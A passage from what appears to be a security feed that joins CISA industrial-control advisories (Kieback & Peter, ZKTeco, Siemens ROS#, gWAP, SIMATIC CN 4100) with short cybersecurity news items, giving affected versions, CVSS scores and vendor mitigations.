consistently applying the defense-in-depth strategy. This concept is supported by organizational measures in the building as part of a safety management system. In order to achieve safety, measures are required at all levels. Vendor fix The DDC4002, DDC4100, DDC4200, DDC4200-L and DDC4400 controllers are end-of-maintenance, therefore the recommendations for these devices are as follows: These devices must be operated in a strictly separate OT environment. Vendor fix The DDC4002, DDC4100, DDC4200, DDC4200-L and DDC4400 controllers are end-of-maintenance, therefore the recommendations for these devices are as follows: Only trusted individuals should be granted network access to the DDC web portal. Vendor fix The DDC4002, DDC4100, DDC4200, DDC4200-L and DDC4400 controllers are end-of-maintenance, therefore the recommendations for these devices are as follows: Access to the web portal should be disabled in the device configuration if not required. Vendor fix The DDC4002, DDC4100, DDC4200, DDC4200-L and DDC4400 controllers are end-of-maintenance, therefore the recommendations for these devices are as follows: Users should be informed that only links from trusted sources should be used to access the web service. Vendor fix For the DDC520, DDC4002e, DDC4200e, DDC4400e, DDC4020e, and DDC4040e controllers, Kieback & Peter recommends the following safety measure: Restrict network access to the device Vendor fix For the DDC520, DDC4002e, DDC4200e, DDC4400e, DDC4020e, and DDC4040e controllers, Kieback & Peter recommends the following safety measure: Do not directly connect the device to the Internet Vendor fix Update the firmware to the latest available version: DDC4002e -> Update to version 1.23.5 or newer Vendor fix Update the firmware to the latest available version: DDC4200e -> Update to version 1.23.5 or newer Vendor fix Update the firmware to the latest available version: DDC4400e -> Update to version 1.23.5 or newer Vendor fix Update the firmware to the latest available version: DDC4020e -> Update to version 1.23.5 or newer Vendor fix Update the firmware to the latest available version: DDC4040e -> Update to version 1.23.5 or newer Vendor fix Update the firmware to the latest available version: DDC520 -> Update to version 1.24.2 or newer Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Acknowledgments Maximilian Hildebrand of G DATA Advanced Analytics reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-05-19 Date Revision Summary 2026-05-19 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could result in information disclosure, including capture of camera account credentials. The following versions of ZKTeco CCTV Cameras are affected: SSC335-GC2063-Face-0b77 Solution CVSS Vendor Equipment Vulnerabilities v3 9.1 ZKTeco ZKTeco CCTV Cameras Authentication Bypass Using an Alternate Path or Channel Background Critical Infrastructure Sectors: Commercial Facilities Countries/Areas Deployed: Worldwide Company Headquarters Location: China Vulnerabilities Expand All + CVE-2026-8598 An undocumented configuration export port is accessible on some models of ZKTeco CCTV cameras. This port does not require authentication and exposes critical information about the camera such as open services and camera account credentials. View CVE Details Affected Products ZKTeco CCTV Cameras Vendor: ZKTeco Product Version: ZKTeco SSC335-GC2063-Face-0b77 Solution: <V5.0.1.2.20260421 Product Status: known_affected Remediations Mitigation ZKTeco has patched this vulnerability in firmware version V5.0.1.2.20260421. ZKTeco recommends that users upgrade to firmware version V5.0.1.2.20260421 or later at their earliest opportunity. Mitigation Please see the security advisory from ZKTeco here: https://www.zkteco.com/en/announcement/23 for further information. https://www.zkteco.com/en/announcement/23 Relevant CWE: CWE-288 Authentication Bypass Using an Alternate Path or Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Acknowledgments Souvik Kandar reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-05-19 Date Revision Summary 2026-05-19 1 Initial Publication Legal Notice and Terms of Use

CVE-2026-42897 stems from a cross-site scripting (XSS) vulnerability and can allow an attacker to compromise Outlook Web Access (OWA) mailboxes.

The now-patched vulnerabilities in the rapidly growing AI agent framework allow attackers to steal credentials, escalate privileges, and maintain persistence.

Until this past weekend, a contractor for the Cybersecurity & Infrastructure Security Agency (CISA) maintained a public GitHub repository that exposed credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems. Security experts said the public archive included files detailing how CISA builds, tests and deploys software internally, and that it represents one of the most egregious government data leaks in recent history.

Multiple vulnerabilities have been discovered in NGINX, the most severe of which could allow for remote code execution. NGINX is a software used for web serving, reverse proxying, caching, and load balancing. Successful exploitation of the most severe of these vulnerabilities may allow an unauthenticated threat actor to crash vulnerable NGINX worker processes by sending crafted HTTP requests. Additionally, for systems with Address Space Layout Randomization (ASLR) disabled, exploitation may result in remote code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have less rights on the system could be less impacted than those who operate with administrative user rights.

Security experts have long warned that insecure automatic tank gauge (ATG) systems exposed on the Internet can be tampered with by threat actors.

AI agents capable of discovering and exploiting obscure vulnerabilities are emerging alongside developers producing vast amounts of potentially flawed AI-generated code, forcing defenders to adapt accordingly.

From the MGM and Caesars fiasco and MOVEit's patch nightmare to epic business blunders and the jaded reality of living in a post-breach world, Dark Reading looks back at the mistakes, miscalculations, systemic failures, and cringeworthy moments that still have us shaking our heads.

The House Committee on Homeland Security sent a letter about the Canvas cyberattack, the same day that the edtech company said it reached an "agreement" with the ShinyHunters cybercriminals.

A vulnerability has been discovered in Microsoft Exchange Server that could allow for arbitrary code execution. Microsoft Exchange Server is an enterprise-level email and collaboration platform developed by Microsoft that runs on Windows Server. Successful exploitation could allow for arbitrary JavaScript to be executed in the browser context. The malicious code would run with the same permissions as your browser, allowing attackers to steal data, install malware, or hijack your computer.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-42897 Microsoft Exchange Server Cross-Site Scripting Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

A Taiwanese student experimenting with software-defined radio technology shut down three bullet trains for nearly an hour, leading to an anti-terrorism response.

The acquisition looks to boost visibility into third-party ecosystems, which are becoming a bigger concern as vectors for supply chain attacks.

This is the second time this year a threat actor has leveraged a CVSS 10.0 vulnerability in Cisco's network control system.

Attackers uniquely fingerprint victims before delivering spear-phishing payloads aimed at espionage, in the latest campaign from the Belarussian nation-state threat group.

OpenAI said the damage was limited to the employees’ devices, and did not affect user data nor its production systems, and none of its intellectual property was stolen.

An 18-year-old flaw in the NGINX open-source web server, discovered using an autonomous scanning system, can be exploited for denial of service and, under certain conditions, remote code execution. [...]

Cargo theft now starts with phishing emails and stolen credentials, not hijackings, to reroute and steal freight from supply chains. NMFTA outlines how cyber-enabled cargo crime is changing transportation security. [...]

A group of likely Russian government hackers tried to hack a security researcher who investigates spyware attacks. He was then able to turn the tables on the hackers and reveal details of their espionage campaign.

If any of the MCP attack classes in this series happened in your environment today, would you detect it? Most MCP servers log only a tool name and a timestamp. This post walks through what that gap looks like in practice, how EchoLeak exploited it, and what proper audit logging actually requires.

Initial access broker KongTuke has moved to Microsoft Teams for social engineering attacks, taking as little as five minutes to gain persistent access to corporate networks. [...]

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.  CVE-2026-20182 Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability  This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Note: Please adhere to CISA’s guidelines to assess exposure and mitigate risks associated with Cisco SD-WAN devices as outlined in Emergency Directive 26-03: Mitigate Vulnerabilities in Cisco SD-WAN Systems and Supplemental Direction ED 26-03: Hunt and Hardening Guidance for Cisco SD-WAN Systems. Adhere to the applicable Binding Operational Directive (BOD) 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.  Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

A Nitrogen ransomware attack on Foxconn's North American facilities is one of 600 hits on manufacturers this year, as gangs increasingly target the sector for its low tolerance for downtime.

View CSAF Summary ROS# contains a ROS service file_server, that before version 2.2.2 contains a path traversal vulnerability which could allow an attacker to access, i.e. read and write, arbitrary files, which are accessible with the user rights of the user that runs the service, on the system that hosts service. Siemens has released a new version for ROS# and recommends to update to the latest version. The following versions of Siemens Siemens ROS# are affected: ROS# vers:intdot/<2.2.2 CVSS Vendor Equipment Vulnerabilities v3 9.1 Siemens Siemens Siemens ROS# Relative Path Traversal Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-41551 Affected versions contain a path traversal vulnerability because user input is not properly sanitized. This could allow a remote attacker to access arbitrary files on the device. View CVE Details Affected Products Siemens Siemens ROS# Vendor: Siemens Product Version: ROS# Product Status: known_affected Remediations Mitigation For versions before 2.2.2: - run file_server on a trusted network only. - run file_server with appropriate user rights. - run file_server only for tasks it was designed for, transferring URDF files from ROS host to target system, not as a service that runs continuously in the background. - run file_server only if manually transferring files is not possible. Vendor fix Update to V2.2.2 or later version https://github.com/siemens/ros-sharp/releases/tag/2.2.2 Relevant CWE: CWE-23 Relative Path Traversal Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Acknowledgments Alifia Rahmah of VyPr AI reported this vulnerability to Siemens. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-357982 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-357982 advisory Legal Notice and Terms of Use

View CSAF Summary Siemens gPROMS Web Applications Publisher (gWAP) is affected by a remote code execution vulnerability introduced through a third-party component, namely the Axios HTTP client library. The vulnerability stems from a specific "Gadget" attack chain that allows prototype pollution in other third-party libraries, potentially allowing an attacker to execute arbitrary code. Siemens has released a new version for gWAP and recommends to update to the latest version. The following versions of Siemens gWAP are affected: gWAP vers:intdot/<3.1.1  CVSS Vendor Equipment Vulnerabilities v3 8 Siemens Siemens gWAP Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-40175 Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1. View CVE Details Affected Products Siemens gWAP Vendor: Siemens Product Version: gWAP Product Status: known_affected Remediations Vendor fix Update to V3.1.1 or later version https://support.sw.siemens.com/product/284395347/ Relevant CWE: CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8 HIGH CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-876049 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-876049 advisory Legal Notice and Terms of Use

View CSAF Summary SIMATIC CN 4100 contains multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released a new version for SIMATIC CN 4100 and recommends to update to the latest version. The following versions of Siemens SIMATIC are affected: SIMATIC CN 4100 vers:intdot/<5.0  CVSS Vendor Equipment Vulnerabilities v3 9.6 Siemens Siemens SIMATIC NULL Pointer Dereference, Reachable Assertion, Use After Free, Out-of-bounds Write, Integer Overflow or Wraparound, Allocation of Resources Without Limits or Throttling, Out-of-bounds Read, Covert Timing Channel, Stack-based Buffer Overflow, Inefficient Algorithmic Complexity, Missing Release of Memory after Effective Lifetime, Improper Restriction of Operations within the Bounds of a Memory Buffer, Improper Input Validation, Improper Locking, Uncontrolled Recursion, Buffer Access with Incorrect Length Value, Race Condition within a Thread, Missing Synchronization, Use of Uninitialized Resource, Double Free, Missing Release of Resource after Effective Lifetime, Loop with Unreachable Exit Condition ('Infinite Loop'), Improper Update of Reference Count, Improper Control of a Resource Through its Lifetime, Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'), Unexpected Status Code or Return Value, Divide By Zero, Improper Validation of Specified Index, Position, or Offset in Input, Comparison Using Wrong Factors, Observable Timing Discrepancy, Improper Validation of Syntactic Correctness of Input, Deadlock, Signal Handler Race Condition, Improper Following of Specification by Caller, Improper Check for Dropped Privileges, Transmission of Private Resources into a New Sphere ('Resource Leak'), Improper Resource Shutdown or Release, Improper Access Control, Exposure of Sensitive Information to an Unauthorized Actor, Relative Path Traversal, Improper Neutralization of Escape, Meta, or Control Sequences, Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade'), Uncontrolled Resource Consumption, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Missing Authentication for Critical Function, Improper Check for Unusual or Exceptional Conditions Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2024-47704 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check link_res->hpo_dp_link_enc before using it [WHAT & HOW] Functions dp_enable_link_phy and dp_disable_link_phy can pass link_res without initializing hpo_dp_link_enc and it is necessary to check for null before dereferencing. This fixes 2 FORWARD_NULL issues reported by Coverity. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2024-57924 In the Linux kernel, the following vulnerability has been resolved: fs: relax assertions on failure to encode file handles Encoding file handles is usually performed by a filesystem >encode_fh() method that may fail for various reasons. The legacy users of exportfs_encode_fh(), namely, nfsd and name_to_handle_at(2) syscall are ready to cope with the possibility of failure to encode a file handle. There are a few other users of exportfs_encode_{fh,fid}() that currently have a WARN_ON() assertion when ->encode_fh() fails. Relax those assertions because they are wrong. The second linked bug report states commit 16aac5ad1fa9 ("ovl: support encoding non-decodable file handles") in v6.6 as the regressing commit, but this is not accurate. The aforementioned commit only increases the chances of the assertion and allows triggering the assertion with the reproducer using overlayfs, inotify and drop_caches. Triggering this assertion was always possible with other filesystems and other reasons of ->encode_fh() failures and more particularly, it was also possible with the exact same reproducer using overlayfs that is mounted with options index=on,nfs_export=on also on kernels < v6.6. Therefore, I am not listing the aforementioned commit as a Fixes commit. Backport hint: this patch will have a trivial conflict applying to v6.6.y, and other trivial conflicts applying to stable kernels < v6.6. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-617 Reachable Assertion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2024-58240 In the Linux kernel, the following vulnerability has been resolved: tls: separate no-async decryption request handling from async If we're not doing async, the handling is much simpler. There's no reference counting, we just need to wait for the completion to wake us up and return its result. We should preferably also use a separate crypto_wait. I'm not seeing a UAF as I did in the past, I think aec7961916f3 ("tls: fix race between async notify and socket close") took care of it. This will make the next fix easier. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVE-2025-6021 A flaw was found in libxml2's xmlBuildQName function, where integer overflows in buffer size calculations can lead to a stack-based buffer overflow. This issue can result in memory corruption or a denial of service when processing crafted input. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-6052 A flaw was found in how GLib’s GString manages memory when adding data to strings. If a string is already very large, combining it with more input can cause a hidden overflow in the size calculation. This makes the system think it has enough memory when it doesn’t. As a result, data may be written past the end of the allocated memory, leading to crashes or memory corruption. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-7425 A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H CVE-2025-8916 Allocation of Resources Without Limits or Throttling vulnerability in Legion of the Bouncy Castle Inc. BC Java bcpkix on All (API modules), Legion of the Bouncy Castle Inc. BC Java bcprov on All (API modules), Legion of the Bouncy Castle Inc. BCPKIX FIPS bcpkix-fips on All (API modules) allows Excessive Allocation. This vulnerability is associated with program files https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertPathReviewer.Java, https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathReviewer.Java. This issue affects BC Java: from 1.44 through 1.78; BC Java: from 1.44 through 1.78; BCPKIX FIPS: from 1.0.0 through 1.0.7, from 2.0.0 through 2.0.7. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-9230 Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-9231 Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms. Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker.. While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack. OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-385 Covert Timing Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L CVE-2025-9232 Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address. Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 